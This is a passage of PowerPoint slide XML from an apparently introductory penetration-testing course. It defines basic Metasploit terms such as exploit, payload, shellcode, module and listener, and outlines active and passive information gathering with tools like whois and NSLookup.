                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>use reports to communicate what you did, how you did it, and, most important</a:t>
            </a:r>
            <a:endParaRPr lang="ar-EG" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="ar-EG" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="ar-EG" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="348918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864388" y="285789"/>
            <a:ext cx="9867687" cy="392540"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="pt-BR" sz="2400" b="1" dirty="0">
                <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>      Chapter 2</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="pt-BR" sz="2400" dirty="0">
                <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="pt-BR" sz="2400" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>M E T A S P L O I T   B A S I C S</a:t>
            </a:r>
            <a:endParaRPr lang="ar-EG" sz="2400" dirty="0">
              <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="TextBox 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CC5DE35D-5084-497A-63B7-3957DE18460A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="430698" y="939900"/>
            <a:ext cx="10735069" cy="5632311"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="1">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Exploit</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>	Exploit is the means by which an attacker, or pen tester for that matter, takes</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>advantage of a flaw within a system, an application, or a service</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Payload</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>	Payload is code that we want the system to execute and that is to be selected</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>	delivered by the Framework. For example, a reverse shell is a payload</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Shellcode</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>	Shellcode is a set of instructions used as a payload when exploitation occurs.</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Shellcode is typically written in assembly language</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Module</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>	Module in the context of this book is a piece of software that can be used by</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>	the Metasploit Framework</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Listener</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>	Listener is a component within Metasploit that waits for an incoming connection</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>	of some sort. For example, after the target machine has been exploited, it may</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>	call the attacking machine over the Internet</a:t>
            </a:r>
            <a:endParaRPr lang="ar-EG" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="32709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1940632" y="319411"/>
            <a:ext cx="8310736" cy="231902"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Chapter 3</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="pt-BR" sz="2400" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>I N T E L L I G E N C E  G A T H E R I N G</a:t>
            </a:r>
            <a:endParaRPr lang="ar-EG" sz="2400" dirty="0">
              <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9AEFC8FF-DA94-B78E-D65E-D93515940249}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9180821" y="2859802"/>
            <a:ext cx="248786" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="1">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="ar-EG" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="7" name="Diagram 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{032AF7DF-69CF-AF25-4E5B-765501602B14}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr/>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="832794167"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="2762393" y="949735"/>
          <a:ext cx="8128000" cy="5825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83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115412" y="61479"/>
            <a:ext cx="4211111" cy="852920"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="457200" indent="-457200" algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Active</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" dirty="0"/>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="1" dirty="0"/>
              <a:t>( Per To Per )</a:t>
            </a:r>
            <a:endParaRPr lang="ar-EG" sz="1100" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="TextBox 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{72C543BD-82EA-B9EF-9739-E57BE0FF561A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="115412" y="3508780"/>
            <a:ext cx="1396536" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="1">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Passive</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="ar-EG" sz="2400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="TextBox 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A7D42F62-AD1A-4424-D433-BC5B83D2507B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="428051" y="4032780"/>
            <a:ext cx="10992744" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>	Using passive and indirect information gathering, you can discover information about targets 	without touching their systems.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="TextBox 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A6E6608B-1C47-2121-A0E9-ADC47DBC75CA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="380005" y="622401"/>
            <a:ext cx="8853298" cy="923330"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="1">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>In active information gathering, we interact directly with a system to learn </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> 	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>more about it. We might, for example, conduct port scans for open ports on</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>the target or conduct scans to determine what services running.</a:t>
            </a:r>
            <a:endParaRPr lang="ar-EG" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="TextBox 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C8F13EFE-B090-AAE0-48CE-28B9FDDB2818}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="371892" y="1545731"/>
            <a:ext cx="883575" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="1">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Tools</a:t>
            </a:r>
            <a:endParaRPr lang="ar-EG" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="TextBox 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5BC14E19-E008-4EA0-366C-6F3D2FE7C977}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="371891" y="4704624"/>
            <a:ext cx="883575" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="1">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="285750" indent="-285750">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Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Tools</a:t>
            </a:r>
            <a:endParaRPr lang="ar-EG"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14" name="TextBox 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8233C88A-4F24-9A5D-A51B-884DADDD14FA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1448961" y="5188693"/>
            <a:ext cx="1544012" cy="830997"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="1">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>whois Lookups</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Netcraft</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>NSLookup</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="ar-EG" sz="1200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="TextBox 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
